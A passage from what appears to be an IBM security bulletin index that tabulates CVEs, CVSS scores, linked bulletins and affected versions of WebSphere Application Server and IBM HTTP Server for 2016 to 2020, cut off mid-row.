**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2020-27221 | 9.8 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14797 | 3.7 | [IBM Java SDK for October 2020 CPU](<https://www.ibm.com/support/pages/node/6379260>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14782 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14781 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14621 | 5.3 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14581 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14579 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14578 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-14577 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-13938 | 6.2 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6464029>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-11985 | 5.3 | Not affected | [Spoofing Vulnerability](<https://www.ibm.com/support/pages/node/6324789>) | 9.0 \n| CVE-2020-10693 | 5.3 | [Bypass security](<https://www.ibm.com/support/pages/node/6348216>) | Not affected | Liberty \n| CVE-2020-5258 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6443101>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2020-5016 | 5.3 | [Directory traversal](<https://www.ibm.com/support/pages/node/6427873>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4949 | 8.2 | [XXE vulnerability](<https://www.ibm.com/support/pages/node/6408244>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4782 | 6.5 | [Directory Traversal](<https://www.ibm.com/support/pages/node/6356083>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4643 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6334311>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4629 | 2.9 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6339255>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4590 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/6333623>) | Not affected | Liberty \n| CVE-2020-4589 | 8.1 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6258333>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4578 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6328895>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4576 | 5.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6339807>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2020-4575 | 4.7 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6323293>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2020-4534 | 7.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6255074>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4464 | 8.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6250059>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4450 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6220294>) | Not affected | 9.0,8.5 \n| CVE-2020-4449 | 7.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6220296>) | Not affected | 9.0, 8.5, 8.0,7.0 \n| CVE-2020-4448 | 9.8 | [Remote Code Execution](<https://www.ibm.com/support/pages/node/6220336>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2020-4421 | 5.0 | [Identity spoofing](<https://www.ibm.com/support/pages/node/6205926>) | Not affected | Liberty \n| CVE-2020-4365 | 5.3 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6209099>) | Not affected | 8.5 \n| CVE-2020-4362 | 7.5 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6174417>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4329 | 4.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6201862>) | Not affected | 9.0,8.5,8.0,7.0,Liberty \n| CVE-2020-4304 | 6.1 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6147195>) | Not affected | Liberty \n| CVE-2020-4303 | 6.1 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/6147195>) | Not affected | Liberty \n| CVE-2020-4276 | 7.5 | [Privilege Escalation](<https://www.ibm.com/support/pages/node/6118222>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-4163 | 6.6 | [Command Execution](<https://www.ibm.com/support/pages/node/1288786>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2020-2800 | 4.8 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2781 | 5.3 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2773 | 3.7 | [IBM Java SDK for January 2021 CPU](<https://www.ibm.com/support/pages/node/6415639>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2755 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2754 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2654 | 3.7 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2601 | 6.8 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2593 | 4.8 | [IBM Java SDK for January 2020 CPU](<https://www.ibm.com/support/pages/node/1289194>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-2590 | 3.7 | [IBM Java SDK for July 2020 CPU](<https://www.ibm.com/support/pages/node/6256732>) | Not affected | 9.0,8.5,Liberty \n| CVE-2020-1934 | 8.1 | Not affected | [Denial of Service](<https://www.ibm.com/support/pages/node/6191631>) | 9.0,8.5,8.0,7.0 \n| CVE-2020-1927 | 7.4 | Not affected | [Phishing attack](<https://www.ibm.com/support/pages/node/6191631>) | 9.0,8.5,8.0,7.0 \n \n**2019 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2019-17573 | 6.1 | [Cross-site Scripting](<https://www.ibm.com/support/pages/node/6100132>) | Not affected | Liberty \n| CVE-2019-17566 | 7.5 | [Server-side request forgery](<https://www.ibm.com/support/pages/node/6322683>) | Not affected | 9.0,8.5,8.0 \n| CVE-2019-17495 | 5.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/1274596>) | Not affected | Liberty \n| CVE-2019-12402 | 4.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/1074156>) | Not affected | Liberty \n| CVE-2019-12406 | 5.3 | [Denial of Service](<https://www.ibm.com/support/pages/node/1288774>) | Not affected | 9.0,Liberty \n| CVE-2019-11777 | 7.5 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6602039>) | Not affected | Liberty \n| CVE-2019-10098 | 3.7 | Not affected | [Phishing attack](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-10092 | 4.7 | Not affected | [Cross-site scripting](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-10086 | 5.3 | [Unauthorized Access](<https://www.ibm.com/support/pages/node/1115085>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-9518 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9517 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9515 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9514 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9513 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-9512 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1072860>) | Not affected | Liberty \n| CVE-2019-4732 | 7.2 | [IBM Java SDK for January 2020 CPU](<https://www.ibm.com/support/pages/node/1289194>) | Not affected | 9.0,8.5,Liberty \n| CVE-2019-4720 | 7.5 | [Denial of Service](<https://www.ibm.com/support/pages/node/1285372>) | Not affected | 9.0, 8.5, 8.0, 7.0 Liberty \n| CVE-2019-4670 | 6.5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/1289152>) | Not affected | 9.0,8.5,8.0,7.0 \n| CVE-2019-4663 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/1127367>) | Not affected | Liberty \n| CVE-2019-4505 | 3.7 | [Information Disclosure](<https://www.ibm.com/support/pages/node/964766>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4477 | 5.3 | [Information Disclosure](<https://www.ibm.com/support/pages/node/960290>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4442 | 4.3 | [Path Traversal](<https://www.ibm.com/support/pages/node/959021>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4441 | 5.3 | [Information disclosure](<https://www.ibm.com/support/pages/node/959023>) | Not affected | 9.0, 8.5, 8.0, 7.0 Liberty \n| CVE-2019-4305 | 5.3 | [Information disclosure](<https://www.ibm.com/support/pages/node/960171>) | Not affected | Liberty \n| CVE-2019-4304 | 6.3 | [Bypass security](<https://www.ibm.com/support/pages/node/960171>) | Not affected | Liberty \n| CVE-2019-4285 | 5.4 | [Clickjacking vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10884064>) | Not affected | Liberty \n| CVE-2019-4279 | 9.0 | [Remote Code Execution](<https://www-01.ibm.com/support/docview.wss?uid=ibm10883628>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4271 | 3.5 | [HTTP Parameter Pollution](<https://www.ibm.com/support/pages/node/884040>) | Not affected | 9.0, 8.5, 7.0Virtual Enterprise \n| CVE-2019-4270 | 5.4 | [Cross-site scripting](<https://www.ibm.com/support/pages/node/884036>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4269 | 5.3 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10884032>) | Not affected | 9.0 \n| CVE-2019-4268 | 5.3 | [Path Traversal](<https://www.ibm.com/support/pages/node/884030>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4080 | 6.5 | [Denial of Service](<https://www-01.ibm.com/support/docview.wss?uid=ibm10875692>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-4046 | 5.9 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869570>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2019-4030 | 5.4 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869406>) | Not affected | 9.0, 8.5, 8.0VE, 7.0VE \n| CVE-2019-2989 | 6.8 | [IBM Java SDK for October 2019 CPU](<https://www.ibm.com/support/pages/node/1126887>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2019-2949 | 6.8 | [IBM Java SDK for April 2020 CPU](<https://www.ibm.com/support/pages/node/6206850>) | Not affected | 9.0,8.5,Liberty \n| CVE-2019-2426 | 3.7 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2019-0220 | 5.3 | Not affected | [Weaker Security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10880413>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2019-0211 | 8.2 | Not affected | [Privilege Escalation](<https://www-01.ibm.com/support/docview.wss?uid=ibm10880413>) | 9.0 \n \n**2018 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| N/A | 8.1 | [Remote code execution in JSF](<http://www-01.ibm.com/support/docview.wss?uid=ibm10716525>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2018-25031 | 5.4 | [Spoofing vulnerability](<https://www.ibm.com/support/pages/node/6569505>) | Not affected | Liberty \n| CVE-2018-20843 | 3.3 | Not affected | [Denial of service](<https://www.ibm.com/support/pages/node/964768>) | 9.0, 8.5, 8.0, 9.0 \n| CVE-2018-17199 | 5.3 | Not affected | [Bypass security ](<http://www-01.ibm.com/support/docview.wss?uid=ibm10869064>) | 9.0 \n| CVE-2018-12547 | 9.8 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2018-12539 | 8.4 | [IBM Java SDK for July 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729349>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-10237 | 7.5 | \n\n[Denial of service](<https://www-01.ibm.com/support/docview.wss?uid=ibm10795696>)\n\n| Not affected | 9.0, 8.5, Liberty \n| CVE-2018-8039 | 7.5 | [Man-in-the-Middle](<https://www-01.ibm.com/support/docview.wss?uid=ibm10720065>) | Not affected | 9.0 Liberty \n| CVE-2018-3180 | 5.6 | [IBM Java SDK for October 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729607>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-3139 | 3.1 | [IBM Java SDK for October 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729607>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2800 | 4.2 | [IBM Java SDK for April 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22016282>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2783 | 7.4 | [IBM Java SDK for April 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22016282>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2637 | 7.4 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2634 | 6.8 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2633 | 8.3 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2603 | 5.3 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2602 | 4.5 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-2579 | 3.7 | [IBM Java SDK for January 2018 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22013818>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1996 | 5.3 | [Weaker Security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10793421>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1957 | 4.0 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10744247>) | Not affected | 9.0 \n| CVE-2018-1926 | 4.3 | [Cross-site Request Forgery](<http://www-01.ibm.com/support/docview.wss?uid=ibm10742301>) | Not affected | 9.0, 8.5 \n| CVE-2018-1905 | 7.1 | [XXE vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738721>) | Not affected | 9.0 \n| CVE-2018-1904 | 8.1 | [Remote Code execution](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738735>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1902 | 3.1 | [Spoofing Vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10795115>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1901 | 5.0 | [Privilege Escalation](<http://www-01.ibm.com/support/docview.wss?uid=ibm10738727>) | Not affected | 9.0, 8.5, Liberty \n| CVE-2018-1890 | 5.6 | [IBM Java SDK for January 2019 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10873042>) | Not affected | 9.0, 8.5, Library \n| CVE-2018-1851 | 7.3 | [Code execution](<https://www-01.ibm.com/support/docview.wss?uid=ibm10735105>) | Not affected | Liberty \n| CVE-2018-1840 | 6.0 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=ibm10735767>) | Not affected | \n\n9.0, 8.5 \n \n| CVE-2018-1798 | 6.1 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=ibm10730703>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1797 | 6.3 | [Directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=ibm10730699>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1794 | 6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729571>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1793 | 6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729563>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1777 | 5.4 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10730631>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1770 | 6.5 | [Directory traversal](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729521>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1767 | 6.1 | [Cross-site scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729547>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1755 | 5.9 | [Information Disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10728689>) | Not affected | Liberty \n| CVE-2018-1719 | 5.9 | [Weaker security](<https://www-01.ibm.com/support/docview.wss?uid=ibm10718837>) | Not affected | 9.0, 8.5 \n| CVE-2018-1695 | 7.3 | [Spoofing vulnerability](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716523>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2018-1683 | 5.9 | [Information disclosure](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716533>) | Not affected | Liberty \n| CVE-2018-1656 | 7.4 | [IBM Java SDK for July 2018 CPU](<https://www-01.ibm.com/support/docview.wss?uid=ibm10729349>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2018-1643 | 6.1 | [Cross-site Scripting](<https://www-01.ibm.com/support/docview.wss?uid=ibm10716857>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2018-1626 | 4.3 | [Cross-site Request Forgery](<http://www-01.ibm.com/support/docview.wss?uid=ibm10742301>) | Not affected | 9.0, 8.5 \n| CVE-2018-1621 | 4.4 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016821>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1614 | 5.8 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016887>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1567 | 9.8 | [Code execution](<https://www-01.ibm.com/support/docview.wss?uid=swg22016254>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1553 | 5.3 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22016218>) | Not affected | Liberty \n| CVE-2018-1447 | 5.1 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1427 | 6.2 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2018-1426 | 7.4 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \nROBOT | CVE-2018-1388 | 9.1 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22014196>) | 7.0 \n| CVE-2018-1301 | 5.3 | Not affected | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n \n**2017 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2017-15715 | 3.7 | Not affected | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-15710 | 5.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22015344>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-12624 | 5.3 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22013597>) | Not affected | 9.0, Liberty \n| CVE-2017-12618 | 5.5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22009782>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-12613 | 9.1 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22013598>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-10388 | 7.5 | [IBM Java SDK for October 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22010560>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10356 | 6.2 | [IBM Java SDK for October 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22010560>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10116 | 8.3 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10115 | 7.5 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-10102 | 9.0 | [IBM Java SDK for July 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22007002>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-9798 | 7.5 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22009782>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-7679 | 5.3 | Not affected | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-7668 | 5.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-5638 | 7.3 | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg22000122>) | [Not affected bulletin](<http://www-01.ibm.com/support/docview.wss?uid=swg22000122>) | \n| CVE-2017-3736 | 5.9 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-3732 | 5.3 | Not affected | [Vulnerability in GSKit Component](<http://www-01.ibm.com/support/docview.wss?uid=swg22015347>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-3511 | 7.7 | [IBM Java SDK for April 2017 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg22003016>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-3167 | 5.3 | Not affected | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg22005280>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1788 | 5.3 | [Spoofing](<http://www-01.ibm.com/support/docview.wss?uid=swg22012341>) | Not affected | 9.0, Liberty \n| CVE-2017-1743 | 4.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22013601>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1741 | 4.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22012342>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1731 | 8.8 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg22012345>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1681 | 4.0 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22010419>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-1583 | 5.3 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22008707>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2017-1504 | 5.3 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22006803>) | Not affected | 9.0 \n| CVE-2017-1503 | 6.1 | [HTTP response splitting](<http://www-01.ibm.com/support/docview.wss?uid=swg22006815>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1501 | 5.9 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg22006810>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2017-1382 | 5.1 | [Insecure file permissions](<http://www-01.ibm.com/support/docview.wss?uid=swg22004785>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1381 | 2.9 | [Information disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg22004792>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1380 | 5.4 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg22004786>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2017-1194 | 4.3 | [Cross-site request forgery](<http://www-01.ibm.com/support/docview.wss?uid=swg22001226>) | Not affected | 9.0, 8.5, 8.0, 7.0, Liberty \n| CVE-2017-1151 | 8.1 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21999293>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2017-1137 | 5.9 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21998469>) | Not affected | 8.5, 8.0 \n| CVE-2017-1121 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21997743>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n \n**2016 CVEs**\n\n**Name **\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2016-1000031 | 9.8 | [Execute Code](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428>) | Not affected | 9.0, 8.5, 8.0, Liberty \n| CVE-2016-9736 | 3.7 | [Information Disclosure](<http://www-01.ibm.com/support/docview.wss?uid=swg21991469>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2016-8934 | 5.4 | [Cross-site scripting vulnerability](<http://www-01.ibm.com/support/docview.wss?uid=swg21992315>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2016-8919 | 5.9 | [Denial of service](<http://www-01.ibm.com/support/docview.wss?uid=swg21993797>) | Not affected | 9.0,8.5, 8.0, 7.0 \n| CVE-2016-8743 | 6.1 | Not affected | [Response splitting attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21996847>) | 9.0,8.5, 8.0, 7.0 \n| CVE-2016-7056 | 4.0 | Not 